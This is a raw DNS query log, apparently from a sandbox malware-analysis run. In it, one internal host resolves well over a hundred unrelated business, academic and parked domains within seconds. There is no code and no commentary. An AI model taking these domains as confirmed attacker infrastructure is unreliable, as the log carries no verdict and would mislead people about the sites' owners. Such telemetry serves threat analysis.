                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.283241034 CET8.8.8.8192.168.2.50x8c5Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.309775114 CET8.8.8.8192.168.2.50xd7f4Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.330312014 CET8.8.8.8192.168.2.50x6892Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.341161966 CET8.8.8.8192.168.2.50x6860Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.368629932 CET8.8.8.8192.168.2.50x9746Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.381146908 CET8.8.8.8192.168.2.50x78d3Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.411026001 CET8.8.8.8192.168.2.50xcc56No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.581576109 CET8.8.8.8192.168.2.50x1164Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.679100037 CET8.8.8.8192.168.2.50x62f4No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.743717909 CET8.8.8.8192.168.2.50x890Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.800843954 CET8.8.8.8192.168.2.50xa386Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.809957027 CET8.8.8.8192.168.2.50xd2f7No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.828028917 CET8.8.8.8192.168.2.50xf7ebName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.873770952 CET8.8.8.8192.168.2.50x79d3No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.964365959 CET8.8.8.8192.168.2.50x2a4dNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:40.990688086 CET8.8.8.8192.168.2.50x1b58Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.008539915 CET8.8.8.8192.168.2.50xc009No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.008539915 CET8.8.8.8192.168.2.50xc009No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.058945894 CET8.8.8.8192.168.2.50xd327Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.087598085 CET8.8.8.8192.168.2.50x3d9fName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.157037973 CET8.8.8.8192.168.2.50x4b66Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.190234900 CET8.8.8.8192.168.2.50x96bServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.220489979 CET8.8.8.8192.168.2.50x5fadServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.273212910 CET8.8.8.8192.168.2.50xfc30Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.275408983 CET8.8.8.8192.168.2.50x1accNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.322284937 CET8.8.8.8192.168.2.50x8f7bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.364012003 CET8.8.8.8192.168.2.50x9746Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.390964031 CET8.8.8.8192.168.2.50x1691No error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.533427954 CET8.8.8.8192.168.2.50x78d3Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.623780012 CET8.8.8.8192.168.2.50x1164Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.685956955 CET8.8.8.8192.168.2.50x90b2No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.685956955 CET8.8.8.8192.168.2.50x90b2No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.817922115 CET8.8.8.8192.168.2.50xa5deNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.830082893 CET8.8.8.8192.168.2.50x1853No error (0)vivastay.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.830082893 CET8.8.8.8192.168.2.50x1853No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.830082893 CET8.8.8.8192.168.2.50x1853No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.830082893 CET8.8.8.8192.168.2.50x1853No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.990881920 CET8.8.8.8192.168.2.50x413dNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.026200056 CET8.8.8.8192.168.2.50xfb4fNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.297435999 CET8.8.8.8192.168.2.50xfc30Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.311683893 CET8.8.8.8192.168.2.50x8f7bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.367381096 CET8.8.8.8192.168.2.50x9746Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.454775095 CET8.8.8.8192.168.2.50xbe55No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.606095076 CET8.8.8.8192.168.2.50xca03No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.606231928 CET8.8.8.8192.168.2.50x1164Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.158847094 CET8.8.8.8192.168.2.50xd051No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.230967045 CET8.8.8.8192.168.2.50x524eNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.251123905 CET8.8.8.8192.168.2.50x51a3No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.333851099 CET8.8.8.8192.168.2.50x8f7bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.370835066 CET8.8.8.8192.168.2.50x5d47No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.578731060 CET8.8.8.8192.168.2.50x7bdfNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.796142101 CET8.8.8.8192.168.2.50xb9e6No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.849282026 CET8.8.8.8192.168.2.50x2f95No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.870887995 CET8.8.8.8192.168.2.50xf1c5No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.288615942 CET8.8.8.8192.168.2.50xfc30Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.368601084 CET8.8.8.8192.168.2.50x9746Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.390595913 CET8.8.8.8192.168.2.50x5b36No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.466018915 CET8.8.8.8192.168.2.50x53ceNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.466018915 CET8.8.8.8192.168.2.50x53ceNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.600984097 CET8.8.8.8192.168.2.50x1164Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.718847990 CET8.8.8.8192.168.2.50x42ddNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.718847990 CET8.8.8.8192.168.2.50x42ddNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.825046062 CET8.8.8.8192.168.2.50xa6faNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.825046062 CET8.8.8.8192.168.2.50xa6faNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.969497919 CET8.8.8.8192.168.2.50xbae3No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.319288969 CET8.8.8.8192.168.2.50xdeebServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.395523071 CET8.8.8.8192.168.2.50x2b83Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.495683908 CET8.8.8.8192.168.2.50x645eNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.610840082 CET8.8.8.8192.168.2.50x1cb0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.621970892 CET8.8.8.8192.168.2.50xaa8bNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.749286890 CET8.8.8.8192.168.2.50xe33No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.889919043 CET8.8.8.8192.168.2.50x6a37No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.302072048 CET8.8.8.8192.168.2.50xdeebServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.397507906 CET8.8.8.8192.168.2.50x2b83Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.638756990 CET8.8.8.8192.168.2.50x7d0eNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.638756990 CET8.8.8.8192.168.2.50x7d0eNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.713794947 CET8.8.8.8192.168.2.50x6d79No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.715115070 CET8.8.8.8192.168.2.50x9802No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.715115070 CET8.8.8.8192.168.2.50x9802No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.715115070 CET8.8.8.8192.168.2.50x9802No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.715115070 CET8.8.8.8192.168.2.50x9802No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.734210014 CET8.8.8.8192.168.2.50xad05No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.302788019 CET8.8.8.8192.168.2.50xdeebServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.373410940 CET8.8.8.8192.168.2.50x9431No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.411216021 CET8.8.8.8192.168.2.50x2b83Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.575010061 CET8.8.8.8192.168.2.50x2e49No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.615233898 CET8.8.8.8192.168.2.50x1cb0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.766923904 CET8.8.8.8192.168.2.50x778cServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.186292887 CET8.8.8.8192.168.2.50xa7c9No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.490472078 CET8.8.8.8192.168.2.50x5183Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.524430037 CET8.8.8.8192.168.2.50x4aabServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.562520027 CET8.8.8.8192.168.2.50x5833Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.734312057 CET8.8.8.8192.168.2.50x6fadNo error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.734312057 CET8.8.8.8192.168.2.50x6fadNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.734312057 CET8.8.8.8192.168.2.50x6fadNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.734312057 CET8.8.8.8192.168.2.50x6fadNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.737760067 CET8.8.8.8192.168.2.50x973cName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.047708988 CET8.8.8.8192.168.2.50xec1cServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.318849087 CET8.8.8.8192.168.2.50xdeebServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.411477089 CET8.8.8.8192.168.2.50x2b83Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.493320942 CET8.8.8.8192.168.2.50xb79dNo error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.629565001 CET8.8.8.8192.168.2.50x1cb0Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.832215071 CET8.8.8.8192.168.2.50xd528No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.832215071 CET8.8.8.8192.168.2.50xd528No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.840384960 CET8.8.8.8192.168.2.50x3f15No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.097460032 CET8.8.8.8192.168.2.50x94ceNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.097460032 CET8.8.8.8192.168.2.50x94ceNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.346507072 CET8.8.8.8192.168.2.50x58cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.424035072 CET8.8.8.8192.168.2.50x552Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.634388924 CET8.8.8.8192.168.2.50xc992Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.352787018 CET8.8.8.8192.168.2.50x58cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.429771900 CET8.8.8.8192.168.2.50x552Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.583837986 CET8.8.8.8192.168.2.50xc3c1No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.583837986 CET8.8.8.8192.168.2.50xc3c1No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.592238903 CET8.8.8.8192.168.2.50xf3bbNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.592238903 CET8.8.8.8192.168.2.50xf3bbNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.594161034 CET8.8.8.8192.168.2.50x94c7No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.631206036 CET8.8.8.8192.168.2.50xc992Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.785491943 CET8.8.8.8192.168.2.50xa006Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.810934067 CET8.8.8.8192.168.2.50x4462Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.842683077 CET8.8.8.8192.168.2.50x7fa0Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.999042988 CET8.8.8.8192.168.2.50x24d0No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.232379913 CET8.8.8.8192.168.2.50x379cNo error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.374439955 CET8.8.8.8192.168.2.50x58cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.397334099 CET8.8.8.8192.168.2.50x132cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.437350035 CET8.8.8.8192.168.2.50x552Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.532152891 CET8.8.8.8192.168.2.50xc392No error (0)vivastay.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.532152891 CET8.8.8.8192.168.2.50xc392No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.532152891 CET8.8.8.8192.168.2.50xc392No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.532152891 CET8.8.8.8192.168.2.50xc392No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.633220911 CET8.8.8.8192.168.2.50xc992Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.695827961 CET8.8.8.8192.168.2.50x8116No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.843144894 CET8.8.8.8192.168.2.50x288eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.902364016 CET8.8.8.8192.168.2.50x5c49No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.279067039 CET8.8.8.8192.168.2.50x6ce1No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.291845083 CET8.8.8.8192.168.2.50xcb2dServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.293859005 CET8.8.8.8192.168.2.50x5de8No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.409423113 CET8.8.8.8192.168.2.50x373eNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.192941904 CET8.8.8.8192.168.2.50xa666No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.384373903 CET8.8.8.8192.168.2.50x58cfServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.428339005 CET8.8.8.8192.168.2.50xed4No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.820132017 CET8.8.8.8192.168.2.50xc992Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.820624113 CET8.8.8.8192.168.2.50x552Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.389826059 CET8.8.8.8192.168.2.50x6b9cName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.390969992 CET8.8.8.8192.168.2.50x3919No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.391406059 CET8.8.8.8192.168.2.50x6df9No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.391932011 CET8.8.8.8192.168.2.50x8a86No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.410475969 CET8.8.8.8192.168.2.50x73d4No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.410475969 CET8.8.8.8192.168.2.50x73d4No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.412214041 CET8.8.8.8192.168.2.50x3794Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.412240982 CET8.8.8.8192.168.2.50x6096Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.412329912 CET8.8.8.8192.168.2.50xb53dNo error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.414115906 CET8.8.8.8192.168.2.50x64fdNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.417120934 CET8.8.8.8192.168.2.50x9071No error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.417464018 CET8.8.8.8192.168.2.50x5035No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.422930956 CET8.8.8.8192.168.2.50xf199No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.422930956 CET8.8.8.8192.168.2.50xf199No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
